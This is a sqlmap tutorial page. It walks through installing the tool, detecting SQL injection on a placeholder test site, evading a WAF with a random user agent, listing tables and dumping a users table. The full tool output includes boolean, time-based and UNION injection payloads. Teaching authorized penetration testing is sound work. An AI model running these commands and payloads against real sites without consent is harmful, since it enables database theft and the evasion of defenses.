Running sqlmap yourself is not difficult. This tutorial will take you from noob to ninja with this powerful sql injection testing tool.
Sqlmap is a python based tool, which means it will usually run on any system with python. However, we like Linux and specifically Ubuntu, it simply makes it easy to get stuff done. Python comes already installed in Ubuntu. This is the same tool we use on our online sql injection test site.
To begin using sqlmap, simply download the tool, unpack it, and run the command with the necessary options.
For those of you using Windows, I'll begin by explaining how to set up an Ubuntu installation. Starting on an Ubuntu Linux system is straightforward, even for those apprehensive about Linux.
Install SQLmap
Step 1: Get a Linux based Operating System
If you are going to run SQLmap on Windows with Python, make sure you have Python installed, and skip down to the next step. Otherwise, get your Linux system fired up. Either install a Linux virtual machine (Ubuntu or Kali recommended) on Windows (Virtualbox / VMware / Parrallels) or boot up your Linux desktop.
If you run Microsoft Windows as your main operating system, it is convenient and simple to run an install of Ubuntu Linux (or Kali Linux) in a virtual machine. You can then play with sqlmap, nmap, nikto and openvas along with a hundred other powerful open source security tools.
Step 2: SQLmap Installation
Python is pre-installed in Ubuntu, so all you need to do is clone the latest repository from git and start your testing.
elliot@evilcorp:~$ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
Cloning into 'sqlmap-dev'...
remote: Enumerating objects: 732, done.
remote: Counting objects: 100% (732/732), done.
remote: Compressing objects: 100% (483/483), done.
remote: Total 732 (delta 250), reused 488 (delta 236), pack-reused 0
Receiving objects: 100% (732/732), 7.07 MiB | 10.99 MiB/s, done.
Resolving deltas: 100% (250/250), done.
Change into the directory and run the python script to ensure all looks good.
elliot@evilcorp:~$ cd sqlmap-dev elliot@evilcorp:~/sqlmap-dev$ python3 sqlmap.py __H__ ___ ___[']_____ ___ ___ {1.8.4.5#dev} |_ -| . ['] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org Usage: python3 sqlmap.py [options] sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge-output or --dependencies), use -h for basic or -hh for advanced helpIf you do not see something like the output above, make sure python is working, try
python -V
to check the version and you are in the right location. Help menu and options
To get a full list help and options available:elliot@evilcorp:~/sqlmap-dev$ python3 sqlmap.py -h
To show advanced help and options available:
elliot@evilcorp:~/sqlmap-dev$ python3 sqlmap.py -hh
How to use SQLmap
SQLMap generally requires parameters to target specific parts of a web application where SQL injection vulnerabilities may exist. While it is possible to run SQLMap against a URL directly, it's often more effective to specify parameters to to conduct accurate testing.
Below is a basic example of how to use SQLMap with a url -u
and a paramenter. The id=5
is the parameter being tested for SQL injection.
Example: Simple HTTP GET based test
elliot@evilcorp:~/sqlmap-dev$ python sqlmap.py -u 'http://mytestsite.com/page.php?id=5'
The results show the different methods used against the parameter.
___ __H__ ___ ___[']_____ ___ ___ {1.8.4.5#dev} |_ -| . ['] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 12:55:56 [12:55:56] [INFO] testing connection to the target URL [12:55:57] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS [12:55:58] [INFO] testing if the target URL content is stable [12:55:58] [INFO] target URL content is stable [12:55:58] [INFO] testing if GET parameter 'id' is dynamic [12:55:58] [INFO] confirming that GET parameter 'id' is dynamic [12:55:59] [INFO] GET parameter 'id' is dynamic [12:55:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [12:56:00] [INFO] testing for SQL injection on GET parameter 'id' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y [12:56:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [12:56:18] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="hac") [12:56:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [12:56:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [12:56:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [12:56:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' [12:56:20] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' [12:56:20] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' [12:56:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [12:56:21] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [12:56:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [12:56:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [12:56:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [12:56:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [12:56:23] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [12:56:23] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)' [12:56:24] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)' [12:56:24] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' [12:56:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)' [12:56:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)' [12:56:25] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)' [12:56:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [12:56:26] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' [12:56:27] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' [12:56:27] [INFO] testing 'MySQL inline queries' [12:56:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)' [12:56:28] [INFO] testing 'MySQL > 5.0.11 stacked queries' [12:56:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)' [12:56:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)' [12:56:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [12:56:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [12:56:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind' [12:56:41] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable [12:56:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [12:56:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [12:56:41] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [12:56:43] [INFO] target URL appears to have 3 columns in query [12:56:46] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 53 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 9561=9561 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=1 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=-6630 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x79434e597a45536f5a4c695273427857546c76554854574c4f5a534f587368725142615a54456256,0x716b767a71),NULL-- mIJj --- [12:56:52] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL >= 5.0.12 [12:56:52] [INFO] fetched data logged to text files under '/home/elliot/.sqlmap/output/mytestsite' [*] shutting down at 12:56:52
Getting blocked by the Web Application Firewall - WAF
Try using a different user agent then the default sqlmap with the--randomagent
parameter.
elliot@evilcorp:~/sqlmap-dev$ python3 sqlmap.py -u "http://mytestsite.com/page.php?id=5" --random-agent
___
__H__
___ ___[,]_____ ___ ___ {1.8.4.5#dev}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:14:04 /2024-03-01/
Retrieve the Database Tables
SQLmap can be used to test and exploit SQL Injection, doing things such as extracting data from databases, updating tables, and even popping shells on remote hosts if all the ducks are in line.
Let's retrieve the tables from the database using the SQL Injection vulnerability we confirmed above. As you will see in the output below, we can continue testing against the target without having to retest the vulnerability. SQLmap uses information it knows about the site to further exploit the target database.
To retrieve data simply add the --tables
parameter to the previous command.
elliot@evilcorp:~/sqlmap-dev$ python sqlmap.py -u 'http://mytestsite.com/page.php?id=5' --tables
___
__H__
___ ___[']_____ ___ ___ {1.8.4.5#dev}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 12:59:04
[12:59:04] [INFO] resuming back-end DBMS 'mysql'
[12:59:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9561=9561
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: ud=-6630 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x79434e597a45536f5a4c695273427857546c76554854574c4f5a534f587368725142615a54456256,0x716b767a71),NULL-- mIJj
---
[12:59:05] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
Database: books
[8 tables]
+---------------------------------------+
| author |
| shoppingcarts |
| categories |
| featured |
| guestbook |
| pictures |
| products |
| users |
+---------------------------------------+
Database: information_schema
[28 tables] == snipped ==
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
[12:59:21] [INFO] fetched data logged to text files under '/home/elliot/.sqlmap/output/mytestsite.com'
[*] shutting down at 12:59:21
Dump the data
To get data we simply extend our command. Adding -T users
will focus in on the users table where we might be able to get some credentials. Adding --dump
will tell SQLmap to grab all the data from the users table, first the columns will be enumerated and then the data will be dumped from the columns.
elliot@evilcorp:~/sqlmap-dev$ python sqlmap.py -u 'http://mytestsite.com/page.php?id=5' --tables ___ __H__ ___ ___[']_____ ___ ___ {1.8.4.5#dev} |_ -| . ['] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 12:59:04 [12:59:04] [INFO] resuming back-end DBMS 'mysql' [12:59:04] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- SNIP ----- Database: users Table: users [1 entry] +----------+----------------------------------+------+-------+---------+------------------------+-----------------+ | name | cart | pass | user | phone | email | address | ----------+-----------------------------------+------+-------+---------+------------------------+-----------------+ | Elliot | 55207107sfefsff8e7f2fa5ef4fa00f6 | test | test | 4563454 | [email protected] | | +----------+----------------------------------+------+-------+---------+------------------------+-----------------+ [13:08:36] [INFO] table 'users' dumped to CSV file '/home/fred/.sqlmap/output/mytestsite/dump/books/users.csv' [13:08:36] [INFO] fetched data logged to text files under '/home/fred/.sqlmap/output/mytestsite' [*] shutting down at 13:08:36
SQLmap Tips - Go ninja on your SQL Injection Testing
Verbose output
When testing for SQL Injection, it is often necessary to dig into the requests manually to determine problems with the test or to confirm or even further exploit a discovered injection. Being able to increase the verbosity of your SQLmap output will help with this testing.
By increasing the verbosity to 4 you can get the HTTP requests, with 5 you also see the HTTP response headers, and 6 will show the full HTTP response. Obviously, this can get super noisy but sometimes you need to see what is happening.
Got Database Credentials?
This handy tip allows you to connect to the database directly and dump data such as users, databases, or tables. The nice thing about this is you don't have to remember the SQL syntax for the database or have a client installed. SQLmap will do the heavy lifting acting as a Database Client to dump data.
DB Connection strings:
MySQL, Oracle, Microsoft SQL Server, PostgreSQL
DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME
SQLite, Microsoft Access
DBMS://DATABASE_FILEPATH
Popping Shells and More
SQLmap has a large number of options, and is an amazing tool for becoming one with a database. Apart from popping shells on the target host, you can send requests through tor, find injections in page responses automatically, spider sites and, of course, perform HTTP POST based testing. These examples merely scratch the surface. Find more examples on the excellent github wiki page.
Next Level Your Technical Network Intelligence
Use Cases and More Info- 13 Vulnerability Scanners
- 17 Free DNS & Network Tools
- 4+ Billion Records of DNS / IP data